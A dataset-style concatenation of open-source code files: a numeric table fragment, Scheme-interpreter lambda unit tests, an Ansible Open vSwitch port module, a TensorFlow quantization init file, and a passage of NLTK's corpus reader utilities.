5925,6629,5532,4932,4613,6041,6630,4636,6384,4780,4204,5658,4423,5821,3989,4683,
5822,6385,4954,6631,5345,6188,5425,5012,5384,3894,6386,4490,4104,6632,5741,5053,
6633,5823,5926,5659,5660,5927,6634,5235,5742,5824,4840,4933,4820,6387,4859,5928,
4955,6388,4143,3584,5825,5346,5013,6635,5661,6389,5014,5484,5743,4337,5176,5662,
6390,2836,6391,3268,6392,6636,6042,5236,6637,4158,6638,5744,5663,4471,5347,3663,
4123,5143,4293,3895,6639,6640,5311,5929,5826,3800,6189,6393,6190,5664,5348,3554,
3594,4749,4603,6641,5385,4801,6043,5827,4183,6642,5312,5426,4761,6394,5665,6191,
4715,2669,6643,6644,5533,3185,5427,5086,5930,5931,5386,6192,6044,6645,4781,4013,
5745,4282,4435,5534,4390,4267,6045,5746,4984,6046,2743,6193,3501,4087,5485,5932,
5428,4184,4095,5747,4061,5054,3058,3862,5933,5600,6646,5144,3618,6395,3131,5055,
5313,6396,4650,4956,3855,6194,3896,5202,4985,4029,4225,6195,6647,5828,5486,5829,
3589,3002,6648,6397,4782,5276,6649,6196,6650,4105,3803,4043,5237,5830,6398,4096,
3643,6399,3528,6651,4453,3315,4637,6652,3984,6197,5535,3182,3339,6653,3096,2660,
6400,6654,3449,5934,4250,4236,6047,6401,5831,6655,5487,3753,4062,5832,6198,6199,
6656,3766,6657,3403,4667,6048,6658,4338,2897,5833,3880,2797,3780,4326,6659,5748,
5015,6660,5387,4351,5601,4411,6661,3654,4424,5935,4339,4072,5277,4568,5536,6402,
6662,5238,6663,5349,5203,6200,5204,6201,5145,4536,5016,5056,4762,5834,4399,4957,
6202,6403,5666,5749,6664,4340,6665,5936,5177,5667,6666,6667,3459,4668,6404,6668,
6669,4543,6203,6670,4276,6405,4480,5537,6671,4614,5205,5668,6672,3348,2193,4763,
6406,6204,5937,5602,4177,5669,3419,6673,4020,6205,4443,4569,5388,3715,3639,6407,
6049,4058,6206,6674,5938,4544,6050,4185,4294,4841,4651,4615,5488,6207,6408,6051,
5178,3241,3509,5835,6208,4958,5836,4341,5489,5278,6209,2823,5538,5350,5206,5429,
6675,4638,4875,4073,3516,4684,4914,4860,5939,5603,5389,6052,5057,3237,5490,3791,
6676,6409,6677,4821,4915,4106,5351,5058,4243,5539,4244,5604,4842,4916,5239,3028,
3716,5837,5114,5605,5390,5940,5430,6210,4332,6678,5540,4732,3667,3840,6053,4305,
3408,5670,5541,6410,2744,5240,5750,6679,3234,5606,6680,5607,5671,3608,4283,4159,
4400,5352,4783,6681,6411,6682,4491,4802,6211,6412,5941,6413,6414,5542,5751,6683,
4669,3734,5942,6684,6415,5943,5059,3328,4670,4144,4268,6685,6686,6687,6688,4372,
3603,6689,5944,5491,4373,3440,6416,5543,4784,4822,5608,3792,4616,5838,5672,3514,
5391,6417,4892,6690,4639,6691,6054,5673,5839,6055,6692,6056,5392,6212,4038,5544,
5674,4497,6057,6693,5840,4284,5675,4021,4545,5609,6418,4454,6419,6213,4113,4472,
5314,3738,5087,5279,4074,5610,4959,4063,3179,4750,6058,6420,6214,3476,4498,4716,
5431,4960,4685,6215,5241,6694,6421,6216,6695,5841,5945,6422,3748,5946,5179,3905,
5752,5545,5947,4374,6217,4455,6423,4412,6218,4803,5353,6696,3832,5280,6219,4327,
4702,6220,6221,6059,4652,5432,6424,3749,4751,6425,5753,4986,5393,4917,5948,5030,
5754,4861,4733,6426,4703,6697,6222,4671,5949,4546,4961,5180,6223,5031,3316,5281,
6698,4862,4295,4934,5207,3644,6427,5842,5950,6428,6429,4570,5843,5282,6430,6224,
5088,3239,6060,6699,5844,5755,6061,6431,2701,5546,6432,5115,5676,4039,3993,3327,
4752,4425,5315,6433,3941,6434,5677,4617,4604,3074,4581,6225,5433,6435,6226,6062,
4823,5756,5116,6227,3717,5678,4717,5845,6436,5679,5846,6063,5847,6064,3977,3354,
6437,3863,5117,6228,5547,5394,4499,4524,6229,4605,6230,4306,4500,6700,5951,6065,
3693,5952,5089,4366,4918,6701,6231,5548,6232,6702,6438,4704,5434,6703,6704,5953,
4168,6705,5680,3420,6706,5242,4407,6066,3812,5757,5090,5954,4672,4525,3481,5681,
4618,5395,5354,5316,5955,6439,4962,6707,4526,6440,3465,4673,6067,6441,5682,6708,
5435,5492,5758,5683,4619,4571,4674,4804,4893,4686,5493,4753,6233,6068,4269,6442,
6234,5032,4705,5146,5243,5208,5848,6235,6443,4963,5033,4640,4226,6236,5849,3387,
6444,6445,4436,4437,5850,4843,5494,4785,4894,6709,4361,6710,5091,5956,3331,6237,
4987,5549,6069,6711,4342,3517,4473,5317,6070,6712,6071,4706,6446,5017,5355,6713,
6714,4988,5436,6447,4734,5759,6715,4735,4547,4456,4754,6448,5851,6449,6450,3547,
5852,5318,6451,6452,5092,4205,6716,6238,4620,4219,5611,6239,6072,4481,5760,5957,
5958,4059,6240,6453,4227,4537,6241,5761,4030,4186,5244,5209,3761,4457,4876,3337,
5495,5181,6242,5959,5319,5612,5684,5853,3493,5854,6073,4169,5613,5147,4895,6074,
5210,6717,5182,6718,3830,6243,2798,3841,6075,6244,5855,5614,3604,4606,5496,5685,
5118,5356,6719,6454,5960,5357,5961,6720,4145,3935,4621,5119,5962,4261,6721,6455,
4786,5963,4375,4582,6245,6246,6247,6076,5437,4877,5856,3376,4380,6248,4160,6722,
5148,6456,5211,6457,6723,4718,6458,6724,6249,5358,4044,3297,6459,6250,5857,5615,
5497,5245,6460,5498,6725,6251,6252,5550,3793,5499,2959,5396,6461,6462,4572,5093,
5500,5964,3806,4146,6463,4426,5762,5858,6077,6253,4755,3967,4220,5965,6254,4989,
5501,6464,4352,6726,6078,4764,2290,5246,3906,5438,5283,3767,4964,2861,5763,5094,
6255,6256,4622,5616,5859,5860,4707,6727,4285,4708,4824,5617,6257,5551,4787,5212,
4965,4935,4687,6465,6728,6466,5686,6079,3494,4413,2995,5247,5966,5618,6729,5967,
5764,5765,5687,5502,6730,6731,6080,5397,6467,4990,6258,6732,4538,5060,5619,6733,
4719,5688,5439,5018,5149,5284,5503,6734,6081,4607,6259,5120,3645,5861,4583,6260,
4584,4675,5620,4098,5440,6261,4863,2379,3306,4585,5552,5689,4586,5285,6735,4864,
6736,5286,6082,6737,4623,3010,4788,4381,4558,5621,4587,4896,3698,3161,5248,4353,
4045,6262,3754,5183,4588,6738,6263,6739,6740,5622,3936,6741,6468,6742,6264,5095,
6469,4991,5968,6743,4992,6744,6083,4897,6745,4256,5766,4307,3108,3968,4444,5287,
3889,4343,6084,4510,6085,4559,6086,4898,5969,6746,5623,5061,4919,5249,5250,5504,
5441,6265,5320,4878,3242,5862,5251,3428,6087,6747,4237,5624,5442,6266,5553,4539,
6748,2585,3533,5398,4262,6088,5150,4736,4438,6089,6267,5505,4966,6749,6268,6750,
6269,5288,5554,3650,6090,6091,4624,6092,5690,6751,5863,4270,5691,4277,5555,5864,
6752,5692,4720,4865,6470,5151,4688,4825,6753,3094,6754,6471,3235,4653,6755,5213,
5399,6756,3201,4589,5865,4967,6472,5866,6473,5019,3016,6757,5321,4756,3957,4573,
6093,4993,5767,4721,6474,6758,5625,6759,4458,6475,6270,6760,5556,4994,5214,5252,
6271,3875,5768,6094,5034,5506,4376,5769,6761,2120,6476,5253,5770,6762,5771,5970,
3990,5971,5557,5558,5772,6477,6095,2787,4641,5972,5121,6096,6097,6272,6763,3703,
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
| mit |
GretelF/kmp-py | interpreter/unittests/test_lambda.py | 1 | 5215 | from interpreter.kmp_py import reader, evaluator,schemeExceptions, initialize
from interpreter.kmp_py.scheme import *
from unittest import TestCase
# initialize global environments and adds initial bindings to globalEnv and syntaxEnv
initialize.initialize()
def call_lambda(lambdaObject, args='', env=None):
if env is None:
env = evaluator.SchemeEvaluator.globalEnv
e = evaluator.SchemeEvaluator()
r = reader.SchemeReader()
args = r.read(SchemeStringStream('({0})'.format(args)))
cons = SchemeCons(lambdaObject, args)
return e.evaluate(cons, env)
def eval_string(string, env = evaluator.SchemeEvaluator.globalEnv):
r = reader.SchemeReader()
e = evaluator.SchemeEvaluator()
obj = r.read(SchemeStringStream(string))
return e.evaluate(obj, env)
class test_Lambdas(TestCase):
def test_lambda_create(self):
obj = eval_string('(lambda () 1)')
self.assertIsNotNone(obj, 'syntax lambda should not return None')
self.assertEqual(obj.type, 'schemeUserDefinedFunction', 'syntax lambda should return a userdefined function.')
obj2 = eval_string('(lambda (a b c) 1 2 3)')
self.assertEqual(obj2.arglist, [SchemeSymbol('a'), SchemeSymbol('b'), SchemeSymbol('c')], 'lambda should have arglist [a,b,c]')
self.assertEqual(obj2.bodylist,[SchemeNumber(1), SchemeNumber(2), SchemeNumber(3)], 'lambda should have body [1, 2, 3]' )
def test_lambda_tooFewArguments(self):
self.assertRaises(schemeExceptions.ArgumentCountException, eval_string, '(lambda x)')
self.assertRaises(schemeExceptions.ArgumentCountException, eval_string, '(lambda)')
def test_lambda_firstArgumentNoCons(self):
self.assertRaises(schemeExceptions.ArgumentTypeException, eval_string, '(lambda 1 2)')
def test_lambda_name(self):
eval_string('(define f (lambda () 1))')
obj = eval_string('f')
self.assertEqual(obj.name, 'f', 'define did not set the name of the lambda.')
eval_string('(define g f)')
obj2 = eval_string('g')
self.assertEqual(obj2.name, obj.name, 'define should not reset the name of the lambda.')
def test_lambda_call(self):
lambdaObject = eval_string('(lambda () 1)')
obj = call_lambda(lambdaObject) # call with no arguments
self.assertEqual(obj.type, 'schemeNumber', 'the lambda should return a type schemeNumber')
self.assertEqual(obj.value, 1, 'the lambda should return schemeNumber 1')
def test_lambda_call_returnLambdaArgument(self):
lambdaObject = eval_string('(lambda (n) n)')
obj = call_lambda(lambdaObject, '10') # call with argument 10
self.assertEqual(obj.type, 'schemeNumber', 'the lambda should return the type of the object, that was passed as argument')
self.assertEqual(obj.value, 10, '10 was passed as argument, so schemeNumber 10 should be returned.')
def test_lambda_call_tooManyArguments(self):
lambdaObject = eval_string('(lambda (n) n)')
self.assertRaises(schemeExceptions.ArgumentCountException, call_lambda, lambdaObject, '10 20 30')
def test_lambda_call_tooFewArguments(self):
lambdaObject = eval_string('(lambda (n) n)')
self.assertRaises(schemeExceptions.ArgumentCountException, call_lambda, lambdaObject)
def test_lambda_makeAdder(self):
initialize.initialize()
eval_string('(define make-adder (lambda(n) (lambda(x) (+ x n))))')
eval_string('(define add10 (make-adder 10))')
lambdaObject = eval_string('add10')
self.assertRaises(schemeExceptions.NoBindingException, eval_string, 'n') # no global n
obj = call_lambda(lambdaObject, '5')
self.assertEqual(obj.type, 'schemeNumber', 'lambda should return type schemeNumber.')
self.assertEqual(obj.value, 15, 'lambda should return schemeNumber 15.')
def test_lambda_tak(self):
initialize.initialize()
eval_string('(define counter 0)')
eval_string(''' (define (tak x y z)
(set! counter (+ counter 1))
(if (< y x)
(tak (tak (- x 1) y z) (tak (- y 1) z x) (tak (- z 1) x y))
z
)
)'''
)
obj = eval_string('(tak 4 0 1)')
self.assertEqual(obj.type, 'schemeNumber', 'tak should return a schemeNumber')
self.assertEqual(obj.value, 0, 'tak should return schemeNumber 1 for arguments 4 0 1')
c = eval_string('counter')
self.assertEqual(c.type, 'schemeNumber', 'counter should be a number.')
self.assertEqual(c.value, 17, 'the counter should be 17 for tak arguments 4 0 1')
def test_lambda_equal(self):
initialize.initialize()
eval_string('(define (f) 1)')
eval_string('(define (g) 1)')
obj = eval_string('(eq? g f)')
self.assertEqual(obj.type, 'schemeFalse', 'g und f should not be equal.')
| mit |
fxfitz/ansible | lib/ansible/modules/network/ovs/openvswitch_port.py | 102 | 8041 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2013, David Stygstra <david.stygstra@gmail.com>
# Portions copyright @ 2015 VMware, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: openvswitch_port
version_added: 1.4
author: "David Stygstra (@stygstra)"
short_description: Manage Open vSwitch ports
requirements: [ ovs-vsctl ]
description:
- Manage Open vSwitch ports
options:
bridge:
required: true
description:
- Name of bridge to manage
port:
required: true
description:
- Name of port to manage on the bridge
tag:
version_added: 2.2
description:
- VLAN tag for this port. Must be a value between
0 and 4095.
state:
default: "present"
choices: [ present, absent ]
description:
- Whether the port should exist
timeout:
default: 5
description:
- How long to wait for ovs-vswitchd to respond
external_ids:
version_added: 2.0
default: {}
description:
- Dictionary of external_ids applied to a port.
set:
version_added: 2.0
description:
- Set a single property on a port.
'''
EXAMPLES = '''
# Creates port eth2 on bridge br-ex
- openvswitch_port:
bridge: br-ex
port: eth2
state: present
# Creates port eth6
- openvswitch_port:
bridge: bridge-loop
port: eth6
state: present
set: Interface eth6
# Creates port vlan10 with tag 10 on bridge br-ex
- openvswitch_port:
bridge: br-ex
port: vlan10
tag: 10
state: present
set: Interface vlan10
# Assign interface id server1-vifeth6 and mac address 00:00:5E:00:53:23
# to port vifeth6 and setup port to be managed by a controller.
- openvswitch_port:
bridge: br-int
port: vifeth6
state: present
args:
external_ids:
iface-id: '{{ inventory_hostname }}-vifeth6'
attached-mac: '00:00:5E:00:53:23'
vm-id: '{{ inventory_hostname }}'
iface-status: active
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
def _external_ids_to_dict(text):
text = text.strip()
if text == '{}':
return None
else:
d = {}
for kv in text[1:-1].split(','):
kv = kv.strip()
k, v = kv.split('=')
d[k] = v
return d
def _tag_to_str(text):
text = text.strip()
if text == '[]':
return None
else:
return text
def map_obj_to_commands(want, have, module):
commands = list()
if module.params['state'] == 'absent':
if have:
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s del-port"
" %(bridge)s %(port)s")
command = templatized_command % module.params
commands.append(command)
else:
if have:
if want['tag'] != have['tag']:
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
" set port %(port)s tag=%(tag)s")
command = templatized_command % module.params
commands.append(command)
if want['external_ids'] != have['external_ids']:
for k, v in iteritems(want['external_ids']):
if (not have['external_ids']
or k not in have['external_ids']
or want['external_ids'][k] != have['external_ids'][k]):
if v is None:
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
" remove port %(port)s"
" external_ids " + k)
command = templatized_command % module.params
commands.append(command)
else:
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
" set port %(port)s"
" external_ids:")
command = templatized_command % module.params
command += k + "=" + v
commands.append(command)
else:
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s add-port"
" %(bridge)s %(port)s")
command = templatized_command % module.params
if want['tag']:
templatized_command = " tag=%(tag)s"
command += templatized_command % module.params
if want['set']:
templatized_command = " -- set %(set)s"
command += templatized_command % module.params
commands.append(command)
if want['external_ids']:
for k, v in iteritems(want['external_ids']):
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
" set port %(port)s external_ids:")
command = templatized_command % module.params
command += k + "=" + v
commands.append(command)
return commands
def map_config_to_obj(module):
templatized_command = "%(ovs-vsctl)s -t %(timeout)s list-ports %(bridge)s"
command = templatized_command % module.params
rc, out, err = module.run_command(command, check_rc=True)
if rc != 0:
module.fail_json(msg=err)
obj = {}
if module.params['port'] in out.splitlines():
obj['bridge'] = module.params['bridge']
obj['port'] = module.params['port']
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s get"
" Port %(port)s tag")
command = templatized_command % module.params
rc, out, err = module.run_command(command, check_rc=True)
obj['tag'] = _tag_to_str(out)
templatized_command = ("%(ovs-vsctl)s -t %(timeout)s get"
" Port %(port)s external_ids")
command = templatized_command % module.params
rc, out, err = module.run_command(command, check_rc=True)
obj['external_ids'] = _external_ids_to_dict(out)
return obj
def map_params_to_obj(module):
obj = {
'bridge': module.params['bridge'],
'port': module.params['port'],
'tag': module.params['tag'],
'external_ids': module.params['external_ids'],
'set': module.params['set']
}
return obj
def main():
""" Entry point. """
argument_spec = {
'bridge': {'required': True},
'port': {'required': True},
'state': {'default': 'present', 'choices': ['present', 'absent']},
'timeout': {'default': 5, 'type': 'int'},
'external_ids': {'default': None, 'type': 'dict'},
'tag': {'default': None},
'set': {'required': False, 'default': None}
}
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
# We add ovs-vsctl to module_params to later build up templatized commands
module.params["ovs-vsctl"] = module.get_bin_path("ovs-vsctl", True)
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(want, have, module)
result['commands'] = commands
if commands:
if not module.check_mode:
for c in commands:
module.run_command(c, check_rc=True)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
sugartom/tensorflow-alien | tensorflow/contrib/quantization/__init__.py | 178 | 1441 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building quantized models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,g-bad-import-order
from tensorflow.contrib.quantization.python import array_ops as quantized_array_ops
from tensorflow.contrib.quantization.python.math_ops import *
from tensorflow.contrib.quantization.python.nn_ops import *
from tensorflow.python.ops import gen_array_ops as quantized_gen_array_ops
from tensorflow.python.ops.gen_array_ops import dequantize
from tensorflow.python.ops.gen_array_ops import quantize_v2
from tensorflow.python.ops.gen_array_ops import quantized_concat
# pylint: enable=unused-import,wildcard-import,g-bad-import-order
| apache-2.0 |
Jaemu/haiku.py | nltk/corpus/reader/util.py | 5 | 31153 | # Natural Language Toolkit: Corpus Reader Utilities
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Steven Bird <sb@ldc.upenn.edu>
# Edward Loper <edloper@gradient.cis.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
import os
import sys
import bisect
import re
import tempfile
try: import cPickle as pickle
except ImportError: import pickle
from itertools import islice
# Use the c version of ElementTree, which is faster, if possible:
try: from xml.etree import cElementTree as ElementTree
except ImportError: from xml.etree import ElementTree
from nltk.tokenize import wordpunct_tokenize
from nltk.internals import slice_bounds
from nltk.data import PathPointer, FileSystemPathPointer, ZipFilePathPointer
from nltk.data import SeekableUnicodeStreamReader
from nltk.sourcedstring import SourcedStringStream
from nltk.util import AbstractLazySequence, LazySubsequence, LazyConcatenation, py25
######################################################################
#{ Corpus View
######################################################################
class StreamBackedCorpusView(AbstractLazySequence):
"""
A 'view' of a corpus file, which acts like a sequence of tokens:
it can be accessed by index, iterated over, etc. However, the
tokens are only constructed as-needed -- the entire corpus is
never stored in memory at once.
The constructor to ``StreamBackedCorpusView`` takes two arguments:
a corpus fileid (specified as a string or as a ``PathPointer``);
and a block reader. A "block reader" is a function that reads
zero or more tokens from a stream, and returns them as a list. A
very simple example of a block reader is:
>>> def simple_block_reader(stream):
... return stream.readline().split()
This simple block reader reads a single line at a time, and
returns a single token (consisting of a string) for each
whitespace-separated substring on the line.
When deciding how to define the block reader for a given
corpus, careful consideration should be given to the size of
blocks handled by the block reader. Smaller block sizes will
increase the memory requirements of the corpus view's internal
data structures (by 2 integers per block). On the other hand,
larger block sizes may decrease performance for random access to
the corpus. (But note that larger block sizes will *not*
decrease performance for iteration.)
Internally, ``CorpusView`` maintains a partial mapping from token
index to file position, with one entry per block. When a token
with a given index *i* is requested, the ``CorpusView`` constructs
it as follows:
1. First, it searches the toknum/filepos mapping for the token
index closest to (but less than or equal to) *i*.
2. Then, starting at the file position corresponding to that
index, it reads one block at a time using the block reader
until it reaches the requested token.
The toknum/filepos mapping is created lazily: it is initially
empty, but every time a new block is read, the block's
initial token is added to the mapping. (Thus, the toknum/filepos
map has one entry per block.)
In order to increase efficiency for random access patterns that
have high degrees of locality, the corpus view may cache one or
more blocks.
:note: Each ``CorpusView`` object internally maintains an open file
object for its underlying corpus file. This file should be
automatically closed when the ``CorpusView`` is garbage collected,
but if you wish to close it manually, use the ``close()``
method. If you access a ``CorpusView``'s items after it has been
closed, the file object will be automatically re-opened.
:warning: If the contents of the file are modified during the
lifetime of the ``CorpusView``, then the ``CorpusView``'s behavior
is undefined.
:warning: If a unicode encoding is specified when constructing a
``CorpusView``, then the block reader may only call
``stream.seek()`` with offsets that have been returned by
``stream.tell()``; in particular, calling ``stream.seek()`` with
relative offsets, or with offsets based on string lengths, may
lead to incorrect behavior.
:ivar _block_reader: The function used to read
a single block from the underlying file stream.
:ivar _toknum: A list containing the token index of each block
that has been processed. In particular, ``_toknum[i]`` is the
token index of the first token in block ``i``. Together
with ``_filepos``, this forms a partial mapping between token
indices and file positions.
:ivar _filepos: A list containing the file position of each block
that has been processed. In particular, ``_toknum[i]`` is the
file position of the first character in block ``i``. Together
with ``_toknum``, this forms a partial mapping between token
indices and file positions.
:ivar _stream: The stream used to access the underlying corpus file.
:ivar _len: The total number of tokens in the corpus, if known;
or None, if the number of tokens is not yet known.
:ivar _eofpos: The character position of the last character in the
file. This is calculated when the corpus view is initialized,
and is used to decide when the end of file has been reached.
:ivar _cache: A cache of the most recently read block. It
is encoded as a tuple (start_toknum, end_toknum, tokens), where
start_toknum is the token index of the first token in the block;
end_toknum is the token index of the first token not in the
block; and tokens is a list of the tokens in the block.
"""
def __init__(self, fileid, block_reader=None, startpos=0,
encoding=None, source=None):
"""
Create a new corpus view, based on the file ``fileid``, and
read with ``block_reader``. See the class documentation
for more information.
:param fileid: The path to the file that is read by this
corpus view. ``fileid`` can either be a string or a
``PathPointer``.
:param startpos: The file position at which the view will
start reading. This can be used to skip over preface
sections.
:param encoding: The unicode encoding that should be used to
read the file's contents. If no encoding is specified,
then the file's contents will be read as a non-unicode
string (i.e., a str).
:param source: If specified, then use an ``SourcedStringStream``
to annotate all strings read from the file with
information about their start offset, end ofset,
and docid. The value of ``source`` will be used as the docid.
"""
if block_reader:
self.read_block = block_reader
# Initialize our toknum/filepos mapping.
self._toknum = [0]
self._filepos = [startpos]
self._encoding = encoding
self._source = source
# We don't know our length (number of tokens) yet.
self._len = None
self._fileid = fileid
self._stream = None
self._current_toknum = None
"""This variable is set to the index of the next token that
will be read, immediately before ``self.read_block()`` is
called. This is provided for the benefit of the block
reader, which under rare circumstances may need to know
the current token number."""
self._current_blocknum = None
"""This variable is set to the index of the next block that
will be read, immediately before ``self.read_block()`` is
called. This is provided for the benefit of the block
reader, which under rare circumstances may need to know
the current block number."""
# Find the length of the file.
try:
if isinstance(self._fileid, PathPointer):
self._eofpos = self._fileid.file_size()
else:
self._eofpos = os.stat(self._fileid).st_size
except Exception as exc:
raise ValueError('Unable to open or access %r -- %s' %
(fileid, exc))
# Maintain a cache of the most recently read block, to
# increase efficiency of random access.
self._cache = (-1, -1, None)
fileid = property(lambda self: self._fileid, doc="""
The fileid of the file that is accessed by this view.
:type: str or PathPointer""")
def read_block(self, stream):
"""
Read a block from the input stream.
:return: a block of tokens from the input stream
:rtype: list(any)
:param stream: an input stream
:type stream: stream
"""
raise NotImplementedError('Abstract Method')
def _open(self):
"""
Open the file stream associated with this corpus view. This
will be called performed if any value is read from the view
while its file stream is closed.
"""
if isinstance(self._fileid, PathPointer):
self._stream = self._fileid.open(self._encoding)
elif self._encoding:
self._stream = SeekableUnicodeStreamReader(
open(self._fileid, 'rb'), self._encoding)
else:
self._stream = open(self._fileid, 'rb')
if self._source is not None:
self._stream = SourcedStringStream(self._stream, self._source)
def close(self):
"""
Close the file stream associated with this corpus view. This
can be useful if you are worried about running out of file
handles (although the stream should automatically be closed
upon garbage collection of the corpus view). If the corpus
view is accessed after it is closed, it will be automatically
re-opened.
"""
if self._stream is not None:
self._stream.close()
self._stream = None
def __len__(self):
if self._len is None:
# iterate_from() sets self._len when it reaches the end
# of the file:
for tok in self.iterate_from(self._toknum[-1]): pass
return self._len
def __getitem__(self, i):
if isinstance(i, slice):
start, stop = slice_bounds(self, i)
# Check if it's in the cache.
offset = self._cache[0]
if offset <= start and stop <= self._cache[1]:
return self._cache[2][start-offset:stop-offset]
# Construct & return the result.
return LazySubsequence(self, start, stop)
else:
# Handle negative indices
if i < 0: i += len(self)
if i < 0: raise IndexError('index out of range')
# Check if it's in the cache.
offset = self._cache[0]
if offset <= i < self._cache[1]:
return self._cache[2][i-offset]
# Use iterate_from to extract it.
try:
return self.iterate_from(i).next()
except StopIteration:
raise IndexError('index out of range')
# If we wanted to be thread-safe, then this method would need to
# do some locking.
def iterate_from(self, start_tok):
# Start by feeding from the cache, if possible.
if self._cache[0] <= start_tok < self._cache[1]:
for tok in self._cache[2][start_tok-self._cache[0]:]:
yield tok
start_tok += 1
# Decide where in the file we should start. If `start` is in
# our mapping, then we can jump straight to the correct block;
# otherwise, start at the last block we've processed.
if start_tok < self._toknum[-1]:
block_index = bisect.bisect_right(self._toknum, start_tok)-1
toknum = self._toknum[block_index]
filepos = self._filepos[block_index]
else:
block_index = len(self._toknum)-1
toknum = self._toknum[-1]
filepos = self._filepos[-1]
# Open the stream, if it's not open already.
if self._stream is None:
self._open()
# Each iteration through this loop, we read a single block
# from the stream.
while filepos < self._eofpos:
# Read the next block.
self._stream.seek(filepos)
self._current_toknum = toknum
self._current_blocknum = block_index
tokens = self.read_block(self._stream)
assert isinstance(tokens, (tuple, list, AbstractLazySequence)), (
'block reader %s() should return list or tuple.' %
self.read_block.__name__)
num_toks = len(tokens)
new_filepos = self._stream.tell()
assert new_filepos > filepos, (
'block reader %s() should consume at least 1 byte (filepos=%d)' %
(self.read_block.__name__, filepos))
# Update our cache.
self._cache = (toknum, toknum+num_toks, list(tokens))
# Update our mapping.
assert toknum <= self._toknum[-1]
if num_toks > 0:
block_index += 1
if toknum == self._toknum[-1]:
assert new_filepos > self._filepos[-1] # monotonic!
self._filepos.append(new_filepos)
self._toknum.append(toknum+num_toks)
else:
# Check for consistency:
assert new_filepos == self._filepos[block_index], (
'inconsistent block reader (num chars read)')
assert toknum+num_toks == self._toknum[block_index], (
'inconsistent block reader (num tokens returned)')
# If we reached the end of the file, then update self._len
if new_filepos == self._eofpos:
self._len = toknum + num_toks
# Generate the tokens in this block (but skip any tokens
# before start_tok). Note that between yields, our state
# may be modified.
for tok in tokens[max(0, start_tok-toknum):]:
yield tok
# If we're at the end of the file, then we're done.
assert new_filepos <= self._eofpos
if new_filepos == self._eofpos:
break
# Update our indices
toknum += num_toks
filepos = new_filepos
# If we reach this point, then we should know our length.
assert self._len is not None
# Use concat for these, so we can use a ConcatenatedCorpusView
# when possible.
def __add__(self, other):
return concat([self, other])
def __radd__(self, other):
return concat([other, self])
def __mul__(self, count):
return concat([self] * count)
def __rmul__(self, count):
return concat([self] * count)
class ConcatenatedCorpusView(AbstractLazySequence):
"""
A 'view' of a corpus file that joins together one or more
``StreamBackedCorpusViews<StreamBackedCorpusView>``. At most
one file handle is left open at any time.
"""
def __init__(self, corpus_views):
self._pieces = corpus_views
"""A list of the corpus subviews that make up this
concatenation."""
self._offsets = [0]
"""A list of offsets, indicating the index at which each
subview begins. In particular::
offsets[i] = sum([len(p) for p in pieces[:i]])"""
self._open_piece = None
"""The most recently accessed corpus subview (or None).
Before a new subview is accessed, this subview will be closed."""
def __len__(self):
if len(self._offsets) <= len(self._pieces):
# Iterate to the end of the corpus.
for tok in self.iterate_from(self._offsets[-1]): pass
return self._offsets[-1]
def close(self):
for piece in self._pieces:
piece.close()
def iterate_from(self, start_tok):
piecenum = bisect.bisect_right(self._offsets, start_tok)-1
while piecenum < len(self._pieces):
offset = self._offsets[piecenum]
piece = self._pieces[piecenum]
# If we've got another piece open, close it first.
if self._open_piece is not piece:
if self._open_piece is not None:
self._open_piece.close()
self._open_piece = piece
# Get everything we can from this piece.
for tok in piece.iterate_from(max(0, start_tok-offset)):
yield tok
# Update the offset table.
if piecenum+1 == len(self._offsets):
self._offsets.append(self._offsets[-1] + len(piece))
# Move on to the next piece.
piecenum += 1
def concat(docs):
"""
Concatenate together the contents of multiple documents from a
single corpus, using an appropriate concatenation function. This
utility function is used by corpus readers when the user requests
more than one document at a time.
"""
if len(docs) == 1:
return docs[0]
if len(docs) == 0:
raise ValueError('concat() expects at least one object!')
types = set([d.__class__ for d in docs])
# If they're all strings, use string concatenation.
if types.issubset([str, unicode, basestring]):
return reduce((lambda a,b:a+b), docs, '')
# If they're all corpus views, then use ConcatenatedCorpusView.
for typ in types:
if not issubclass(typ, (StreamBackedCorpusView,
ConcatenatedCorpusView)):
break
else:
return ConcatenatedCorpusView(docs)
# If they're all lazy sequences, use a lazy concatenation
for typ in types:
if not issubclass(typ, AbstractLazySequence):
break
else:
return LazyConcatenation(docs)
# Otherwise, see what we can do:
if len(types) == 1:
typ = list(types)[0]
if issubclass(typ, list):
return reduce((lambda a,b:a+b), docs, [])
if issubclass(typ, tuple):
return reduce((lambda a,b:a+b), docs, ())
if ElementTree.iselement(typ):
xmltree = ElementTree.Element('documents')
for doc in docs: xmltree.append(doc)
return xmltree
# No method found!
raise ValueError("Don't know how to concatenate types: %r" % types)
######################################################################
#{ Corpus View for Pickled Sequences
######################################################################
class PickleCorpusView(StreamBackedCorpusView):
"""
A stream backed corpus view for corpus files that consist of
sequences of serialized Python objects (serialized using
